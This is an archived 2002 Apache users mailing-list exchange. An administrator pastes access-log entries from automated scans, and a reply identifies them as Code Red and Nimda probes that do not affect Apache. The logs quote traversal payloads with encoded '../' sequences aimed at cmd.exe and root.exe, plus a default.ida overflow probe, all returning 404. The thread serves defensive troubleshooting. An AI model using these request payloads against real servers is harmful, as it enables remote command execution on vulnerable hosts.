httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Andrew Kenna" <andr...@stamina.com.au>
Subject RE: [users@httpd] httpd-access.log query
Date Fri, 13 Sep 2002 00:34:29 GMT
They are microsoft security holes, such as Code Red, Nimda etc

Your apache server is not vulnerable, for more information check out the
apache faq on httpd.apache.org

Andrew


-----Original Message-----
From: Doug Young [mailto:dougy@brizzie.org] 
Sent: Friday, 13 September 2002 10:21 AM
To: users@httpd.apache.org
Subject: [users@httpd] httpd-access.log query


Been getting HEAPS of messages like these in httpd-access.log lately
.... assume the script kiddies at play again ... not that those commands
won't help them much on a unix system. I've been firewall the offending
IPs but wonder if there is a better remedy.

Any suggestions / comments ??


203.51.185.233 - - [13/Sep/2002:04:02:05 +1000] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 278 "-" "-" 203.51.185.233 - -
[13/Sep/2002:04:02:06 +1000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404
276 "-" "-" 203.51.185.233 - - [13/Sep/2002:04:02:07 +1000] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286 " 203.51.185.233 - -
[13/Sep/2002:04:02:07 +1000] "GET /d/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 286 " 203.51.185.233 - - [13/Sep/2002:04:02:08 +1000] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTT 203.51.185.233 - -
[13/Sep/2002:04:02:09 +1000] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system
203.51.185.233 - - [13/Sep/2002:04:02:09 +1000] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system
203.51.185.233 - - [13/Sep/2002:04:02:10 +1000] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%
203.51.185.233 - - [13/Sep/2002:04:02:11 +1000] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HT 203.51.185.233 - -
[13/Sep/2002:04:02:11 +1000] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HT 203.51.185.233 - -
[13/Sep/2002:04:02:11 +1000] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HT 203.51.185.233 - -
[13/Sep/2002:04:02:12 +1000] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HT 203.51.185.233 - -
[13/Sep/2002:04:02:12 +1000] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir H 203.51.185.233 - -
[13/Sep/2002:04:02:13 +1000] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTT 203.51.185.233 - -
[13/Sep/2002:04:02:13 +1000] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
203.51.185.233 - - [13/Sep/2002:04:02:13 +1000] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTT 203.69.217.130 - -
[13/Sep/2002:06:46:35 +1000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404
278 "-" "-" 203.69.217.130 - - [13/Sep/2002:06:46:36 +1000] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 404 276 "-" "-" 203.69.217.130 - -
[13/Sep/2002:06:46:37 +1000] "GET /c/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 286 " 203.69.217.130 - - [13/Sep/2002:06:46:38 +1000] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286 " 203.69.217.130 - -
[13/Sep/2002:06:46:39 +1000] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTT 203.69.217.130 - -
[13/Sep/2002:06:46:39 +1000] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system
203.69.217.130 - - [13/Sep/2002:06:46:40 +1000] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system
203.69.217.130 - - [13/Sep/2002:06:46:41 +1000] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%
203.69.217.130 - - [13/Sep/2002:06:46:42 +1000] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HT 203.69.217.130 - -
[13/Sep/2002:06:46:42 +1000] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HT 203.69.217.130 - -
[13/Sep/2002:06:46:43 +1000] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HT 203.69.217.130 - -
[13/Sep/2002:06:46:44 +1000] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HT 203.69.217.130 - -
[13/Sep/2002:06:46:44 +1000] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir H 203.69.217.130 - -
[13/Sep/2002:06:46:45 +1000] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTT 203.69.217.130 - -
[13/Sep/2002:06:46:46 +1000] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
203.69.217.130 - - [13/Sep/2002:06:46:46 +1000] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTT

210.8.46.149 - - [13/Sep/2002:07:22:53 +1000] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
203.247.201.233 - - [13/Sep/2002:09:58:44 +1000] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 278 "-" "-"



---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server
Project. See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Mime
View raw message